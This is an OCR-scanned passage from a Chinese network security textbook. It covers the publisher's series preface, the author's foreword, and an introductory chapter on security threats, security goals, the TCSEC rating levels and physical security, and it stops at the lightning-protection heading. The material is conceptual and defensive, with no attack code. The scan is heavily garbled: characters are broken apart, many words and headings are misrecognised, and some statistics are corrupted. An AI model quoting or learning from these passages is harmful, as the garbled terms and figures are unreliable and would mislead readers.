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出 版 圆 明 


当前 ,重视 实验 与 实践 教育 是 各 国 高 等 教育 界 的 发 展 潮流 ,我 国 与 国外 教学 
工作 的 差距 也 主要 表现 在 实践 教学 环节 上 。 面 对 新 的 形式 和 新 的 挑战 ,完善 实 
验 与 实践 教育 体系 成 为 一 种 必然 。 为 了 培养 具有 高 质量 、 高 素质 、 高 实践 能 力 和 
高 创新 能 力 的 人 才 ，, 全 国 很 多 高 等 院 校 在 实验 与 实践 教学 方面 进行 了 大 力 改革 ， 
在 实验 与 实践 教学 内 容 \ 教 学 方法 、 教 学 体系 、 实 验 室 建设 等 方面 积累 了 大 量 的 
宝贵 经 验 , 起 到 了 教学 示范 作用 。 

实验 与 实践 性 教学 与 理论 教学 是 相辅相成 的 ,具有 同等 重要 的 地 位 。 它 
是 在 开放 教育 的 基础 上 ,为 配合 理论 教学 .培养 学 生 分 析 问 题 和 解决 问题 的 能 
力 以 及 加 强 训练 学 生 专业 实践 能 力 而 设置 的 教学 环节 ;， 对 于 完成 教学 计划 、 
落实 教学 大 纲 ,确保 教学 质量 ,培养 学 生 分 析 问 题 、 解 决 问题 的 能 力 和 实际 操 
作 技 能 更 具有 特别 重要 的 意义 。 同 时 ,实践 教学 也 是 培养 应 用 型 人 才 的 重要 
途径 ,实践 教学 质量 的 好 坏 ,实际 上 也 决定 了 应 用 型 人 才 培 养 质 量 的 高 低 。 因 
此 ,加 强 实践 教学 环节 ,提高 实践 教学 质量 ,对 培养 高 质量 的 应 用 型 人 才 至 关 
重要 。 

近年 来 ,教育 部 把 实验 与 实践 教学 作为 对 高 等 院 校 教学 工作 评估 的 关键 性 
指标 。2005 年 1 月 ,在 教育 部 下 发 的 (关于 进一步 加 强 高 等 学 校本 科教 学 工作 
的 若干 意见 》 中 明确 指出 :“ 高 等 学 校 要 强化 实践 育 人 的 意识 ,区 别 不 同学 科 对 
实践 教学 的 要 求 ,合理 制定 实践 教学 方案 ,完善 实践 教学 体系 。 要 切实 加 强 实 
验 、 实 习 、 社 会 实践 ,毕业 设计 (论文 ) 等 实践 教学 环节 ,保障 各 环节 的 时 间 和 效 
果 , 不 得 降低 要 求 .”,“ 要 不 断 改革 实践 教学 内 容 , 改 进 实 践 教学 方法 ,通过 政策 
引导 ,吸引 高 水 平 教师 从 事实 践 环节 教学 工作 。 要 加 强 产 学 研 合作 教育 ,充分 利 
用 国内 外 资源 ,不 断 拓 展 校 际 之 间 、 校 企 之 间 、 高 校 与 科研 院 所 之 间 的 合作 ,加 强 
各 种 形式 的 实践 教学 基地 和 实验 室 建设 。 

为 了 配合 开展 实践 教学 及 适应 教学 改革 的 需要 ,我 们 在 全 国 各 高 等 院 校 精 
心 挖 据 和 送 选 了 一 批 在 计算 机 实验 与 实践 教学 方面 具有 潜心 研究 并 取得 了 富有 
特色 、 值 得 推广 的 教学 成 果 的 作者 ,把 他 们 多 年 积累 的 教学 经 验 编写 成 教材 ,为 
开展 实践 教学 的 学 校 起 一 个 抛砖引玉 的 示范 作用 。 

为 了 保证 出 版 质量 ,本 大 ,教材 中 的 每 本 书 都 经 过 编 委 会 委员 的 精心 第 选 和 


实践 


严格 评审 ,坚持 宁 缺 姓 滥 的 原则 ,力争 把 每 本 书 都 做 成 精品 。 同 时 ,为 了 能 够 让 更 多 、 更 好 的 
实践 教学 成 果 应 用 于 社会 和 各 高 等 院 校 , 我 们 热切 期 望 在 这 方面 有 经 验 和 成 果 的 教师 能 够 
加 入 到 本 套 丛 书 的 编写 队伍 中 ,为 实践 教学 的 发 展 和 取得 成 效 做 出 贡献 ; 也 衷心 地 期 望 广 
大 读者 对 本 大 ,教材 提出 宝贵 意见 ,以 便 我 们 更 好 地 为 读者 服务 。 


清华 大 学 出 版 社 
联系 人 : 索 梅 suom@tup. tsinghua. edu. cn 


OREWVORD Hi 


随 着 网 络 应 用 的 不 断 普及 ,网 络 中 的 不 安全 因素 也 越 来 越 多 ,影响 到 了 人 们 的 
基本 生活 ,甚至 于 国家 的 前 途 命运 。 通 信 网 络 安全 已 经 成 为 一 个 国际 关注 的 问题 。 

本 书 以 基本 原理 的 应 用 为 中 心 ,理论 紧密 联系 实际 ,系统 地 讲述 了 网 络 安全 
所 涉及 的 理论 及 技术 。 每 章 最 后 都 设计 了 实践 内 容 , 规 划 了 任务 ,通过 实战 演练 
帮助 读者 综合 运用 书 中 所 讲授 的 技术 进行 网 络 信息 安全 方面 的 实践 。 

在 理论 介绍 的 基础 上 ,本 书 强调 了 实验 实践 环节 的 通用 性 和 可 操作 性 ,避免 
了 一 些 传统 网 络 安全 教材 操作 性 不 强 、 理 论 和 实际 联系 不 紧 的 问题 ,重点 介绍 了 
网 络 安全 领域 的 新 间 题 和 工具 的 运用 。 

全 书 共 15 章 , 分 别 为 第 1 章 网 络 安全 概述 、 第 2 章 TCP/IP 基础 .第 3 章 数 
据 加 密 、 第 4 章 通信 安全 ,第 5 SEM AG LS 6 章 计算 机 病毒 、 第 7 章 无 线 网 络 
安全 、 第 8 章 操作 系统 安全 ,第 9 章 移 动 存储 设备 安全 、 第 10 章 网 络 设备 安全 、 
第 11 章 防 火 墙 技 术 、 第 12 章 入 侵 检测 、 第 13 章 Web 安全 ,第 14 章 数据 库 安 
全 ,第 15 章 网 络 安全 风险 评估 。 每 章 首 先 讲解 技术 原理 ,通过 这 一 部 分 使 读者 
在 理论 上 有 一 个 清楚 的 认识 ,然后 是 实践 部 分 ,选用 目前 常用 的 网 络 安全 工具 及 
实验 环境 ,通过 对 工具 的 使 用 与 操作 ,帮助 读者 理解 运用 。 实 践 分 为 实验 和 试 
验 ,实验 在 合理 情境 设计 的 基础 上 以 任务 驱动 ,强调 过 程 ; 试验 在 提出 任务 或 假 
设 的 基础 上 不 设 定 具体 的 过 程 ,强调 方法 和 结果 。 每 章 都 有 各 类 情境 及 问题 供 
读者 学 习 和 思考 ,很 少 有 答案 唯一 的 习题 ,原因 是 希望 读者 在 学 习 过 程 中 不 被 束 
缚 ,主动 思考 ,不 拘泥 于 知识 经 验 , 在 继承 中 创新 。 

本 书 在 编写 过 程 中 参考 了 大 量 国内 外 文献 资料 ,吸取 了 很 多 国内 同行 专家 
的 先进 理念 和 实践 经 验 。 本 书 所 有 实践 环节 均 在 具体 实验 环境 中 测试 通过 ,部 
分 案例 来 自 真 实 环境 。 

本 书 的 1.1~~1.4 节 由 郑 全 英 编写 ,2. 1 一 2. 2 节 由 徐 珍 泉 编写 ,第 8 章 
Linux 实验 部 分 由 张 红 编写 ,9. 1 一 9.4 节 由 孙 俊 灵 编 写 , 第 10 章 由 孙 宝 岐 编写 ， 
第 13 章 由 刘 砚 秋 编 写 , 第 14 章 由 黄静 编写 ,其余 各 章节 及 实践 部 分 均 由 郑 鲁 编 
写 ,最终 统 稿 由 郑 鲁 完 成 。 

限于 编者 水 平 , 加 之 网 络 安全 理论 与 技术 不 断 发 展 及 更 新 , 书 中 难免 有 不 妥 
之 处 , 敬 请 读者 批评 指正 。 


编 者 
2014 年 3 月 
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1.1 网 络 安全 的 重要 性 


安全 性 是 互联 网 技术 中 很 关键 也 很 容易 被 忽略 的 问题 。 许 多 组 织 
因为 曾经 在 使 用 网 络 的 过 程 中 未 意识 到 网 络 安全 的 重要 性 ,直到 受到 了 
资料 安全 的 威胁 后 , 才 开始 重视 和 采取 相应 的 防范 措施 。 因 此 ,在 网 络 
广泛 使 用 的 今天 ,更 应 该 了 解 网 络 安全 ,做 好 防范 措施 ,注重 网 络 信息 的 
保密 性 、 完 整 性 和 可 用 性 。 

中 国 国家 互联 网 应 急 中 心 发 布 的 (2011 年 中 国 互 联网 网 络 安全 态势 
报告 ) 显 示 , 目 前 我 国 对 全 球 互 联网 安全 威胁 低 , 遭 受 境外 网 络 攻击 持续 
增多 ; 网 上 银行 面临 的 钓鱼 威胁 愈演愈烈 ; 工业 控制 系统 安全 事件 呈现 
增长 态势 ; 手机 恶意 程序 现 多 发 态势 ; 木马 和 僵尸 网 络 活动 越发 猩 狐 ; 
应 用 软件 漏洞 呈现 迅猛 增长 的 趋势 ; DDoS 攻击 仍然 呈现 频率 高 .规模 
大 的 特点 。 


1.2 网 络 安全 的 重要 威胁 


影响 计算 机 网 络 安全 的 因素 很 多 ,人 为 的 或 非 人 为 的 ,有 意 的 或 
恶意 的 ,等 等 ,一 个 很 重要 的 因素 是 外 来 黑客 对 网 络 系 统 资源 的 非法 
使 用 ,严重 威胁 着 网 络 的 安全 。 网 络 安全 威胁 可 以 归结 为 以 下 几 个 
方面 。 


1.2.1 人 为 疏忽 


人 为 疏忽 包括 失误 失职. 误 操作 等 。 这 些 可 能 是 工作 人 员 对 安全 
的 配置 不 当 \ 不 注意 保密 工作 、 密 码 选 择 不 够 慎重 等 造成 的 。 比 如 2012 
年 我 国 国内 某 知 名 证 券 网 站 因为 人 为 朴 忽 ,未 禁止 搜索 引擎 搜索 敏感 服 
务 , 导 致 用 户 资料 大 量 泄露 ; 2010 年 我 国 国内 某 通 信 公 司 也 是 因为 人 为 
朴 忽 未 设置 文件 访问 权限 ,导致 用 户 上 传 的 个 人 图 片 可 以 被 其 他 人 随意 
查看 与 删除 。 


实践 


1.2.2. 人 为 的 恶意 攻击 


人 为 的 恶意 攻击 是 网 络 安全 的 最 大 威胁 ,敌意 的 攻击 和 计算 机 犯罪 就 是 这 个 类 别 。 这 
种 攻击 破坏 性 最 强 , 可 能 造成 极 大 的 危害 ,可 能 导致 机 密 数据 的 泄露 。 如 果 涉 及 的 是 金融 机 
构 , 则 很 可 能 导致 破产 ,甚至 会 给 社会 带 来 震荡 。 这 种 攻击 有 主动 攻击 和 被 动 攻击 两 种 。 主 
动 攻击 有 选择 性 地 破坏 信息 的 有 效 性 和 完整 性 。 被 动 攻击 是 在 不 影响 网 络 的 正常 工作 的 情 
况 下 截获 窃取、 破译 ,以 获得 重要 机 密 信息 。 而 且 进 行 这 些 攻击 行为 的 大 多 是 具有 很 高 的 
专业 技能 和 智商 的 人 员 ,一 般 需 要 相当 的 专业 知识 才能 破解 。 互 联网 安全 公司 赛 门 铁 克 发 
布 报告 ,2011 年 7 月 至 2012 年 7 月 间 , 包 括 恶意 软件 攻击 和 钓鱼 攻击 在 内 的 网 络 攻击 给 全 
球 带 来 了 1110 亿美 元 的 损失 。 在 此 期 间 , 全 球 有 5. 56 亿 成 年 网 民 亲 身 经 历 过 网 络 攻击 , 占 
到 了 所 有 成 年 网 民 数量 的 4626. 360 发 布 的 2011—2012 年 度 ( 中 国 互联 网 安全 报告 ) 显 示 ， 
2011 年 我 国 国内 日 均 约 853. 1 万 台电 脑 遭 到 木马 病毒 等 恶意 程序 攻击 , 占 每 天 开机 联网 电 
脑 的 比例 约 为 5.7%。 


1.2.3 网 络 软件 的 漏洞 


网 络 软件 的 缺陷 和 漏洞 为 黑客 提供 了 攻击 机 会 。 软 件 设 计 人 员 为 了 方便 自己 而 设置 的 
后 门 ,一 旦 被 攻破 ,其 后 果 也 是 不 堪 设 想 。 比 如 2012 年 5 月 微软 发 布 公告 MS12-029 显示 
了 一 个 Microsoft Office 中 秘密 报告 的 漏洞 ,如 果 用 户 打 开 特 制 的 RTF 文件 ,该 漏洞 可 能 允 
许 远 程 执行 代码 ,一 个 成 功利 用 此 漏洞 的 攻击 者 可 以 获得 与 当前 用 户 相 同 的 用 户 权 限 。 近 
年 来 ,应 用 软件 漏洞 呈现 迅猛 增长 的 趋势 。2011 年 ,中 国 国 家 信息 安全 漏洞 共享 平台 
(CNVD) 共 收集 整理 并 公开 发 布 信息 安全 漏洞 5547 个 , 较 2010 年 大 幅 增加 60.9%。 其 中 ， 
高 危 漏洞 有 2164 个 , 较 2010 年 增加 约 2.3 倍 。 


1.2.4 非 授 权 访 问 


非 授权 访问 是 没有 访问 权限 的 用 户 以 非 正 当 的 手段 访问 数据 信息 。 非 授权 访问 事件 一 
般 发 生 在 存在 漏洞 的 信息 系统 中 ,黑客 利用 专门 的 漏洞 利用 程序 (Exploit) 来 获取 信息 系统 
访问 权限 。 比 如 Oracle Database 的 组 件 PL/SQL Gateway 在 访问 控制 列表 的 实现 上 存在 
漏洞 ,攻击 者 可 能 非 授权 地 访问 到 被 禁止 访问 的 存储 过 程 ,从 而 完全 获取 数据 库 的 DBA 
权限 。 


1.2.5 信息 泄露 或 丢失 


信息 泄露 或 丢失 是 指 敏 感 数据 被 有 意 或 无 意 地 泄露 出 去 或 丢失 ,通常 包括 信息 在 传输 
或 保存 的 过 程 中 丢失 或 泄露 。 比 如 数据 明文 存储 这 种 方式 比较 容易 导致 信息 泄露 。21 世 
纪 初 ,我 国 国内 某 著名 门户 网 站 免费 邮件 服务 器 系统 升级 时 ,技术 人 员 升 级 失误 删除 了 邮 
件 , 造 成 了 邮件 丢失 且 无 法 恢复 的 严重 后 果 。2005 年 某 银行 存 有 390 万 客户 银行 账号 、 历 


史 支 付 数据 以 及 社会 保障 卡号 的 电脑 磁盘 在 运输 途中 丢失 。2010 #E 2012 年 间 , 我 国 国 
内 几 家 知名 社区 网 站 分 别 被 曝 核 心 用 户 数据 信息 泄露 ,其 中 两 家 分 别 达 到 600 万 及 4000 万 
用 户 注册 的 信息 包括 设置 的 密码 外 泄 , 让 人 更 为 吃惊 的 是 这 里 面 2010 年 以 前 生成 的 数据 大 
都 是 采用 明文 存储 形式 ,给 广大 用 户 带 来 的 潜在 风险 不 言 而 喻 。 


1.2.6 破坏 数据 完整 性 


破坏 数据 完整 性 是 指 以 非法 手段 窃 得 对 数据 的 使 用 权 , 删 改 、 修 改 、 插 入 或 重 发 某 些 信 
息 , 恶 意 添加 、 修 改 数据 ,以 干扰 拥护 的 正常 使 用 。2008 年 某 高 校 招 办 发 现 ,一 些 考生 的 信 
息 被 黑客 添加 到 该 校 录取 数据 库 内 。2009 年 6 月 ,武汉 警方 披露 了 一 起 特大 网 络 招生 诈骗 
案 , 攻 击 者 雇用 黑客 攻击 高 校 招生 网 , 复 改 网 站 录取 信息 ,伪造 录取 通知 书 ,诈骗 8 名 学 生 家 
长 约 300 万 元 。2011 年 有 报道 说 伊朗 修改 了 全 球 定位 系统 数据 ,从 而 捕获 了 一 架 美国 无 人 
侦察 机 。 


1.3 网 络 安全 定义 及 目标 
1.3.1 网 络 安全 定义 

网 络 安全 是 指 为 保护 网 络 免 受 侵害 而 采取 的 措施 的 总 和 。 正 确 地 采用 网 络 安全 措施 ， 
能 使 网 络 得 到 保护 ,使 其 正常 运行 。 网 络 安全 具有 如 下 3 方面 内 容 。 

1. 保密 性 

保密 性 指 网 络 能 够 阻止 未 经 授权 的 用 户 读 取保 密 信息 。 

2. 完整 性 


完整 性 包括 资料 的 完整 性 和 软件 的 完整 性 。 资 料 的 完整 性 指 在 未 经 许可 的 情况 下 确保 
资料 不 被 删除 或 修改 。 软 件 的 完整 性 是 确保 软件 程序 不 会 被 错误 , 怀 有 恶意 的 用 户 或 病毒 
修改 。 


3. 可 用 性 
可 用 性 指 网 络 在 遭受 攻击 时 可 以 确保 合法 用 户 对 系统 的 授权 访问 正常 进行 。 


1.3.2 网 络 安全 性 保护 的 目标 
1. 身份 真实 性 


对 通信 实体 身份 的 真实 性 进行 识别 。21 世纪 ,网 络 安全 最 基础 和 最 重要 的 方面 之 一 就 
是 从 防御 网 络 ( 重 点 放 在 防御 措施 和 限制 访问 的 网 络 ) 转 变 到 信任 网 络 ( 允 许 那些 身份 通过 
可 靠 验证 的 信任 用 户 访问 的 网 络 ) 。 


实践 


为 此 ,设置 防火 墙 可 以 迫使 用 户 在 访问 联网 服务 器 时 必须 输入 用 户 名 和 口令 。 通 过 匹 
配 用户 名 和 口令 或 者 其 他 方法 来 确定 授权 用 户 身 份 的 过 程 称 为 身份 验证 。 有 时 可 以 对 代理 
服务 器 (为 用 户 提供 Web 浏览 .电子 邮件 和 其 他 服务 的 程序 ,以 便 对 网 络 之 外 的 用 户 隐藏 他 
们 的 身份 进行 设置 , 当 用 户 利用 Web 上 网 冲浪 或 使 用 其 他 基于 Internet 的 服务 之 前 ,代理 
服务 器 将 要 求 进行 身份 验证 


2. 信息 机 密 性 


保证 机 密 信息 不 会 泄露 给 非 授权 的 人 或 实体 。 一 个 拥有 存储 个 人 和 财务 信息 数据 库 的 
公司 医院 和 其 他 机 构 都 需要 维护 隐私 ,这 不 仅 是 为 了 保护 客户 的 利益 ,也 是 为 了 维护 他 们 
自己 公司 的 利益 和 可 信和 性。 

要 维护 存储 在 一 个 单位 或 公司 网 络 上 的 信息 的 隐私 ,最 重要 和 最 有 效 的 方法 之 一 就 是 
向 普通 员工 讲授 安全 风险 和 策略 。 这 种 增强 自我 意识 的 教育 并 非 他 们 考虑 的 事项 ,但 它 却 
是 一 项 应 当 实 现 的 重要 任务 。 毕 竞 有 个 别 员工 很 可 能 会 进行 检测 ,甚至 由 于 他 们 自己 的 粗 
心 行为 而 无 意 中 造 成 安全 隐患 。 他 们 还 能 够 监控 同事 的 活动 ,并 且 可 能 会 了 解 到 一 些 人 在 
下 班 后 复制 文件 ,一些 人 在 家 里 使 用 不 安全 的 连接 访问 的 网 络 ,或 者 一 些 其 他 可 疑 的 活动 。 


3. 信息 完整 性 


保证 数据 的 一 致 性 ,防止 非 授权 用 户 或 实体 对 数据 进行 任何 破坏 。 通 常人 侵 者 或 破坏 
者 会 将 虚假 信息 输入 Internet 或 者 在 使 用 TCP/IP 的 网 络 上 传输 数据 的 数据 包 中 , 当 破 坏 
性 或 伪造 的 数据 包 到 达 网 络 的 外 围 时 ,防火 墙 杀 毒 软件 和 入 侵 检 测 系统 (IDS) 都 可 以 阻挡 
它们 。 但 是 ,确保 网 络 安全 的 一 种 更 加 有 效 的 方法 是 在 网 络 的 关键 位 置 就 使 网 络 通信 和 免 受 
列 窃 或 伪造 ,从 而 保持 通信 的 完整 性 。 

利用 在 Internet 上 使 用 的 多 种 加 密 方法 中 的 任意 一 种 ,都 可 以 保持 数据 的 完整 性 。 目 
前 ,最 流行 的 方法 之 一 是 使 用 公 钥 加 密 技术 , 它 使 用 一 种 称 为 密 钥 的 长 代码 块 加 密 通 信 。 网 
络 上 的 每 个 用 户 都 可 以 获得 一 个 或 多 个 密 钥 ,它们 是 经 过 加 密 算法 的 复杂 公式 计算 出 来 的 ， 
很 可 靠 。 

4. 服务 可 用 性 


防止 合法 用 户 对 信息 和 资源 的 使 用 被 不 当 拒绝 。 在 Internet 应 用 的 早期 ,网 络 安全 主 
要 强调 的 是 阻止 黑客 或 其 他 未 经 授权 用 户 访问 公司 的 内 部 网 络 。 然 而 , 随 着 Internet 用 户 
的 快速 增长 ,通过 Internet 进行 的 业务 量 也 越 来 越 多 ,因此 ,这 些 企业 (或 其 他 消费 用 户 ) 经 
常 要 进行 的 许多 活动 都 可 能 会 被 黑客 或 罪犯 分 子 利用 ,所 以 现在 最 需要 的 是 与 信任 用 户 和 
网 络 的 连接 性 。 

黑客 或 其 他 犯罪 分 子 通常 会 通过 一 些 手 段 来 进行 非法 活动 ,比如 直接 访问 对 方 企业 的 
信息 系统 下 订单 ,而 不 再 通过 电话 或 传真 ; 利用 Internet 电子 银行 转账 的 方式 付款 ; 查找 员 
工 的 记录 ; 为 需要 访问 网 络 的 职员 创建 口令 ,等 等 。 

为 了 保证 这 类 业务 的 安全 性 ,许多 企业 的 传统 做 法 就 是 建立 租用 线路 。 租 用 线路 是 由 
拥有 连接 线路 的 电信 公司 建立 的 点 对 点 连接 或 其 他 连接 。 这 种 方式 非常 安全 ,因为 它们 直 
接 将 两 个 企业 网 络 连接 起 来 ,其 他 公司 或 用 户 不 能 使 用 该 电缆 或 连接 。 但 是 租用 线路 的 价 


格 非常 昂贵 。 

为 了 削减 成 本 ,许多 已 经 具有 与 Internet 高 速 连接 的 企业 建立 了 虚拟 专用 网 络 
(VPN), VPN 使 用 加 密 、 身 份 验证 和 数据 封装 技术 ,数据 封装 是 将 数字 信息 的 数据 包装 入 
另 一 个 数据 包 , 从 而 保护 前 者 的 过 程 。 这 些 VPN 可 以 在 使 用 Internet 的 计算 机 或 者 网 络 之 
间 建 立 安全 的 连接 。 数 据 通过 公众 使 用 的 同一 个 Internet 从 一 个 VPN 参与 者 传输 到 另 一 
^ VPN 参与 者 。 不 过 ,数据 由 各 种 安全 措施 进行 安全 保护 。 


5. 不 可 否认 性 


不 可 否认 性 又 称 抗 抵赖 性 , 即 由 于 某 种 机 制 的 存在 ,人 们 不 能 否认 自己 发 送信 息 的 行为 
和 信息 的 内 容 。 传 统 的 方法 是 靠 手 写 签名 和 加 盖 印 章 来 实现 信息 的 不 可 否认 性 。 在 互联 网 
电子 环境 下 ,可 以 建立 有 效 的 责任 机 制 , 比 如 通过 数字 证 书 机 制 进行 的 数字 签名 和 时 间 截 ， 
保证 信息 的 抗 抵 赖 ,防止 实体 否认 其 行为 。 


6. 系统 可 控 性 


系统 可 控 性 能 够 控制 使 用 资源 的 人 或 实体 的 使 用 方式 。 如 果 系 统 提供 了 相应 的 安全 控 
制 部 件 , 形 成 控制 (Control) KEW Detect) 和 评估 (Assess) 环 节 , 构 成 了 完整 的 安全 控制 回 
路 , 则 称 该 系统 的 安全 性 是 结构 可 控 的 (Structure is Controllable, SC) 。 

如 果 用 户 对 系统 的 任何 访问 行为 以 及 系统 内 部 的 安全 状态 变迁 均 是 可 检测 (Detectable) 、 
可 控制 (Controllable) .可 审计 (Auditable) .可 跟踪 (Traceable) 的 , 则 称 该 系统 的 安全 性 是 
行为 可 控 的 (Behavior is Controllable,BC) 。 

为 了 实现 行为 安全 可 控 , 必 须 保证 行为 的 主体 及 客体 均 是 可 鉴别 的 ; 保证 行为 的 特征 
是 可 识别 的 , 即 能 区 别 正常 或 异常 行为 ; 所 有 的 操作 行为 过 程 均 是 有 记录 的 ; 行为 的 作用 
范围 (即行 为 造成 的 影响 ) 是 有 限制 的 。 只 有 这 样 才 具备 可 检测 .可 审计 、 可 跟踪 和 可 控制 的 
基础 。 

如 果 系 统 的 安全 性 既是 结构 可 控 的 ,又 是 行为 可 控 的 , 则 称 该 系统 的 安全 性 是 可 控 的 
(Controllable Security,CS); 如 果 结 构 和 行为 不 能 同时 可 控 , 或 者 是 部 分 可 控 的 , 则 称 该 系 
统 的 安全 性 是 部 分 可 控 的 (Partially Controllable Security, PCS); 如 果 结 构 和 行为 都 不 可 
控 , 则 称 该 系统 的 安全 性 是 不 受 控制 的 (Un-Controllable Security, UCS)。 


7. 系统 易 用 性 


在 满足 安全 要 求 的 条 件 下 ,系统 应 该 操作 简单 、 维 护 方便 。 达 到 系统 易 用 性 ,应 该 重点 
考虑 是 否 符 合 标 准 和 规范 ,是 否 直 观 、 明 了 ,是 否 操作 灵活 、 方 便 , 是 否 舒适 和 友好 ,是 否 符合 
习惯 \ 实 用。 

8. 可 审查 性 

可 审查 性 即 对 出 现 问题 的 网 络 安全 问题 提供 调查 的 依据 和 手段 。 

审查 机 制 保证 有 足够 的 能 力 进行 人 工 和 自动 检测 系统 内 部 结构 ,保证 产生 和 操作 数据 


过 程 的 集中 性 和 可 靠 性 。 为 了 达到 可 审查 性 ,一 定 要 存在 可 靠 的 安全 控制 系统 ,控制 系统 应 
该 具备 对 系统 结构 和 任务 的 清晰 定义 、 对 任务 足够 的 分 离 .各 个 级 别 上 正确 的 审查 、 足 够 的 
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管理 策略 等 。 例 如 Windows NT Server 所 提供 的 策略 及 一 系列 实用 工具 ,可 以 用 来 帮助 安 
全 管理 员 和 安全 审查 员 通过 审查 数据 跟踪 结果 来 检测 系统 的 安全 性 能 。 虽 然 Windows NT 
Server 提供 了 这 种 安全 机 制 ,但 要 保证 安全 性 还 得 靠 正确 的 执行 和 操作 。 


1.4 网 络 安全 的 等 级 


f Hz Jš (Trusted Computer System Evaluation Criteria,TCSEC) 是 计算 机 系统 安全 评 
佑 的 第 一 个 正式 标准 ,于 1970 年 由 美国 国防 科学 委员 会 提出 ,并 于 1985 年 12 月 由 美国 国 
防 部 公布 。TCSEC 最 初 只 是 军用 标准 ,后 来 延至 民用 领域 。TCSEC 将 计算 机 系统 的 安全 
划分 为 4 个 等 级 .7 个 安全 级 别 ( 从 低 到 高 依次 为 D.C1、.C2、B1、B2、B3 和 A 级 )。 

DD 级 和 人 A 级 暂时 不 分 子 级 ,每 级 包括 它 下 级 的 所 有 特性 。 从 最 简单 的 系统 安全 特性 直 
到 最 高 级 的 计算 机 安全 模型 技术 ,不 同 计算 机 信息 系统 可 以 根据 需要 和 可 能 选用 不 同安 全 
保密 程度 的 不 同 标准 。 


1. D% 


D 级 整个 计算 机 系统 是 不 可 信任 的 ,硬件 和 操作 系统 都 很 容易 被 侵袭 。 对 用 户 没 有 验 
证 要 求 。 属 于 这 个 级 别 的 操作 系统 有 DOS, Windows 9x, Apple 公司 的 Macintosh System 
i 


2. C1 级 


C1 级 对 计算 机 系统 硬件 有 一 定 的 安全 机 制 要 求 ,计算 机 在 被 使 用 前 需要 进行 登录 。 但 
是 它 对 登录 到 计算 机 的 用 户 没 有 进行 访问 级 别 的 限制 。 这 是 一 种 典型 的 用 在 UNIX 系统 
上 的 安全 级 别 。 系 统 对 硬件 有 某 种 程度 的 保护 ,但 硬件 受到 损害 的 可 能 性 仍然 存在 。 用 户 
拥有 注册 账号 和 口令 ,系统 通过 账号 和 口令 来 识别 用 户 是 否 合法 ,并 决定 用 户 对 信息 拥有 什 
么 样 的 访问 权限 。 


3. C2 级 


C2 级 又 称 访 问 控制 保护 , 比 C1 级 更 进一步 ,访问 控制 环境 (用 户 权限 级 别 ) 的 引进 , 限 
制 了 用 户 执行 某 些 命令 或 访问 某 些 文件 的 能 力 。 这 也 就 是 说 它 不 仅 进行 了 许可 权限 的 限 
制 , 还 进行 了 基于 身份 级 别 的 验证 。 另 外 ,系统 对 发 生 的 事情 加 以 审计 (Audit) ,并 写 人 日 
志 , 通 过 查看 日 志 , 就 可 以 发 现 人 侵 的 痕迹 ,如 多 次 登录 失败 ,也 可 以 大 致 推测 出 可 能 有 人 想 强 
行 间 入 系统 。 审 计 可 以 记录 下 系统 管理 员 执 行 的 活动 ,审计 还 加 有 身份 验证 ,这 样 就 可 以 知 
道 谁 在 执行 这 些 命令 。 能 够 达到 C2 级 的 常见 操作 系统 有 UNIX RH XENIX, Novell 3. x 
或 更 高 版 本 、Windows NT 和 Windows 2000。 


4. B1 级 


B1 级 即 标号 安全 保护 (Labeled Security Protection) ,是 支持 多 级 安全 (如 秘密 和 绝密 ) 
的 第 一 个 级 别 ,安全 保护 安装 在 不 同 级 别 的 系统 中 ,可 以 对 敏感 信息 提供 更 高 级 别 的 保护 。 
B1 级 安全 措施 的 计算 机 系统 随 着 操作 系统 而 定 , 政 府 机 构 和 系统 安全 承包 商 是 Bl 级 计算 


机 系统 的 主要 拥有 者 。 
5. B2 级 


B2 级 又 叫做 结构 保护 (Structured Protection) 级 别 , 它 要 求 计算 机 系统 中 的 所 有 对 象 
都 加 标签 ,而 且 给 设备 (磁盘 、 磁 带 和 终端 ) 分 配 单 个 或 多 个 安全 级 别 。B2 级 是 较 高 安全 级 
别 的 对 象 与 另 一 个 较 低 安全 级 别 的 对 象 通信 的 第 一 个 级 别 。 


6. B3 级 
B3 级 又 称 安全 域 (Security Domain) 级 别 , 要 求 终端 必须 通过 可 信任 途径 连接 到 网 络 ， 


同时 要 求 采用 硬件 来 保护 安全 系统 的 存储 区 。 例 如 内 存 管理 硬件 ,用 于 保护 安全 域 免 遭 无 
授权 访问 或 其 他 安全 域 对 象 的 修改 。 


7. A 级 


A 级 也 称 为 验证 保护 或 验证 设计 (Verity Design) 级 别 ,是 当前 的 最 高 级 别 , 包 括 一 个 严 
格 的 设计 控制 和 验证 过 程 ,包含 了 较 低 级 别 的 所 有 特性 。 设 计 必须 是 从 数学 角度 上 经 过 验 
证 的 ,而 且 必须 进行 秘密 通道 和 可 信任 分 布 (Trusted Distribution) 的 分 析 。 


1.5 网 络 安全 的 层次 


网 络 安全 层次 包括 物理 安全 、 安 全 控制 和 安全 服务 。 
1.5.1 物理 安全 


物理 安全 是 指 在 物理 介质 层次 上 对 存储 和 传输 的 网 络 信息 的 安全 保护 , 即 保护 计算 机 
网 络 设备 和 其 他 媒体 免 遭 破坏 。 

物理 安全 是 网 络 信 息 安 全 最 基本 的 保障 ,是 整个 安全 系统 必 备 的 组 成 部 分 , 它 包 括 环境 
安全 ,设备 安 全 和 媒体 安全 3 方面 的 内 容 。 

在 这 个 层次 上 可 能 造成 不 安全 的 因素 主要 来 源 于 外 界 作 用 ,如 硬盘 的 受 损 、 电 磁 辐 射 或 
操作 失误 等 。 


1. 防盗 


与 其 他 物体 一 样 ,物理 设备 (如 计算 机 ) 也 是 偷窃 者 的 目标 之 一 ,如 硬盘 、 主 板 等 。 计 算 
机 偷窃 行为 所 造成 的 损失 可 能 远 远 超过 计算 机 本 身 的 价值 ,因此 必须 采取 严格 的 防范 措施 ， 
以 确保 计算 机 设备 不 会 丢失 。 


2. 防火 


计算 机 机 房 发 生火 灾 一 般 是 由 于 电气 原因 、 人 为 事故 或 外 部 火灾 蔓延 引起 的 。 电 气 设 
备 和 线路 可 能 会 因为 短路 ,过载 ,接触 不 良 、 绝 缘 层 破坏 或 静电 等 原因 引起 电 打 火 而 导致 
火灾 。 
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3. 防 静 电 


静电 是 由 物体 间 的 相互 摩 探 、 接 触 而 产生 的 ,计算 机 显示 器 也 会 产生 很 强 的 静电 。 和 静电 
产生 后 如 果 未 能 释放 而 保留 在 物体 内 ,会 有 很 高 的 电位 (能 量 不 大 ) ,会 产生 静电 放电 火花 ， 
可 能 会 造成 火灾 ,还 可 能 使 大 规模 集成 电器 损坏 ,这 种 损坏 可 能 是 不 知 不 觉 造成 的 。 


4. 防 雷击 


